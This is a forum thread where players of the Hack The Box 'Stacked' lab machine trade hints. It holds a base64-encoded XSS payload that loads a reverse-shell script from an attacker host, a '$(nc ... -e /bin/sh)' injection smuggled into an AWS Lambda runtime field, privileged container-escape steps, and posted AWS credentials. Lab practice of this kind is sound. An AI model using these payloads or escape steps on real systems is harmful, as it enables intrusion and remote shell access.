TUTORIAL HTB Stacked [Discussion]
by pheonix2021 - September 18, 2021 at 06:09 PM
#73
(November 05, 2021 at 08:59 PM)gambit1337 Wrote:
(November 05, 2021 at 06:23 PM)gambit1337 Wrote: Anyone managed to escape out of container? Am not able to find any docker.sock file

nvm...... got root!!!!

I am not able to escape root container please help!
Reply
#74
(November 08, 2021 at 02:20 AM)whyshouldicare Wrote:
(November 05, 2021 at 08:59 PM)gambit1337 Wrote:
(November 05, 2021 at 06:23 PM)gambit1337 Wrote: Anyone managed to escape out of container? Am not able to find any docker.sock file

nvm...... got root!!!!

I am not able to escape root container please help!
I also tried some ways but didn't succeed?
Reply
#75
Any help after getting root on container?
Reply
#76
Guys anyone have hints or writeup for this mahcine
Reply
#77
Though change the referer to mail.stacked.htb , The website return 302.... Any hint?
Reply
#78
The docker socket is a tcp docker socker not a unix socket. To connect to 2376, you will need the certs in the containter /root/.docker. Use the tcp docker socket to create a priv docker image and mount the image to the root path. Get a reverse shell from the new image, cd to the mount path to access the root folder.
Reply
#79
Been trying for hours the XSS, anyone has the ones that work so I can compare see what I am doing wrong? the links on the thread do not work anymore. thanks
Reply
#80
(November 25, 2021 at 05:57 AM)rebelon Wrote: Been trying for hours the XSS, anyone has the ones that work so I can compare see what I am doing wrong? the links on the thread do not work anymore. thanks

This works. Decode base64

Y3VybCBodHRwOi8vcG9ydGZvbGlvLnN0YWNrZWQuaHRiL3Byb2Nlc3MucGhwIC1IIFVzZXItQWdl
bnQ6IE1vemlsbGEvNS4wIChYMTE7IExpbnV4IHg4Nl82NDsgcnY6NzguMCkgR2Vja28vMjAxMDAx
MDEgRmlyZWZveC83OC4wIC1IIEFjY2VwdDogYXBwbGljYXRpb24vanNvbiwgdGV4dC9qYXZhc2Ny
aXB0LCAqLyo7IHE9MC4wMSAtSCBBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC41IC0tY29t
cHJlc3NlZCAtSCBSZWZlcmVyOiA8c2NyaXB0IHNyYz0iaHR0cDovL1lPVVJJUDpQT1JUL3JldnNo
LmpzIj48L3NjcmlwdD4gLUggQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVy
bGVuY29kZWQ7IGNoYXJzZXQ9VVRGLTggLUggWC1SZXF1ZXN0ZWQtV2l0aDogWE1MSHR0cFJlcXVl
c3QgLUggT3JpZ2luOiBodHRwOi8vcG9ydGZvbGlvLnN0YWNrZWQuaHRiIC1IIENvbm5lY3Rpb246
IGtlZXAtYWxpdmUgLS1kYXRhLXJhdyBmdWxsbmFtZT10ZXN0MTEmZW1haWw9dGVzdDMlNDBzdGFj
a2VkLmh0YiZ0ZWw9MTEyMjExMjIxMTIyJnN1YmplY3Q9c3Vic2NyaWJlJm1lc3NhZ2U9cGxzK3N1
YnMrbWUK
Reply
#81
Thank you, someone already did sent me the payload to bypass waf on the form that is the piece I had trouble with. thanks @faletemetal
Reply
#82
Got root flag.

=AWS credentials=
[default]
aws_access_key_id = 7Ec28H7TCuvgEK2a9xMsec2-user
aws_secret_access_key = )2gkbfeCd=F-JcxZ0MvFu{|m-Uu=J;xZ9]
aws_session_token = NEWTOKEN2021
Reply
#83
(November 14, 2021 at 06:49 AM)WillSmithRoger Wrote: The docker socket is a tcp docker socker not a unix socket. To connect to 2376, you will need the certs in the containter /root/.docker.  Use the tcp docker socket to create a priv docker image and mount the image to the root path. Get a reverse shell from the new image, cd to the mount path to access the root folder.

Can someone please expand on this. I am having difficulty creating a privileged image using the certs. Step by step process on how do this would be really helpful

(November 14, 2021 at 06:49 AM)WillSmithRoger Wrote: The docker socket is a tcp docker socker not a unix socket. To connect to 2376, you will need the certs in the containter /root/.docker.  Use the tcp docker socket to create a priv docker image and mount the image to the root path. Get a reverse shell from the new image, cd to the mount path to access the root folder.

Can someone please expand on this. I am having difficulty creating a privileged image using the certs. Step by step process on how do this would be really helpful
(November 27, 2021 at 06:04 AM)lowkeylokii Wrote:
(November 14, 2021 at 06:49 AM)WillSmithRoger Wrote: The docker socket is a tcp docker socker not a unix socket. To connect to 2376, you will need the certs in the containter /root/.docker.  Use the tcp docker socket to create a priv docker image and mount the image to the root path. Get a reverse shell from the new image, cd to the mount path to access the root folder.

Can someone please expand on this. I am having difficulty creating a privileged image using the certs. Step by step process on how do this would be really helpful

Ok, so I finally broke out of the container:
Steps (After gaining root on Container):
1. build a new docker image downloading the following 2 files into your root directory https://github.com/tianon/docker-brew-ub...oot.tar.gz and https://github.com/tianon/docker-brew-ub...Dockerfile
> docker build Dockerfile
2. Find out your docker image ID with (will be the image with no repository or tag):
> docker images
3. run
> docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined <IMAGE ID> bash
3. Use POC 2 from https://github.com/carlospolop/hacktrick...ntainer.md
BAM, you will be root on the host machine.

Hit me up with some REP if this helped :)
Reply
#84
(November 05, 2021 at 10:35 AM)phperl Wrote: for root create a lambda function:
aws --endpoint-url=http://localhost:4566 --region=us-east-1 lambda create-function --function-name=myFunction1 --runtime='python27$(nc 10.10.xx.xx xxxx -e /bin/sh)' --role=arn:aws:iam:local --handler=lambda.handler --zip-file=fileb://lambda.zip
aws --endpoint-url=http://localhost:4566 --region=us-east-1 lambda invoke --function-name=myFunction1 xxx

you will in container root and can access docker socket. use the docker container privilege escalation method
I am doing this
bash-5.0$ aws --endpoint-url=http://localhost:4566 --region=us-east-1 lambda create-function --function-name=myFunction1 --runtime='python3$(nc 10.10.XX.XX xxxx -e /bin/sh)' --role=arn:aws:iam:local --handler=lambda.handler --zip-file=fileb://lambda.zip

And getting this error, please help, Thank You
Error parsing parameter '--zip-file': Unable to load paramfile fileb://lambda.zip: [Errno 2] No such file or directory: 'lambda.zip'
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
TUTORIAL HTB Meta [Discussion] pheonix2021 50 9,181 Yesterday at 10:11 AM
Last Post: W5HyNOT
TUTORIAL HTB Toby [Discussion] Aadhi123456 115 30,760 Yesterday at 05:42 AM
Last Post: firamboli
TUTORIAL HTB Fingerprint [Discussion] kalic99 96 25,049 Yesterday at 02:13 AM
Last Post: whyshouldicare

 Users browsing this thread: 1 Guest(s)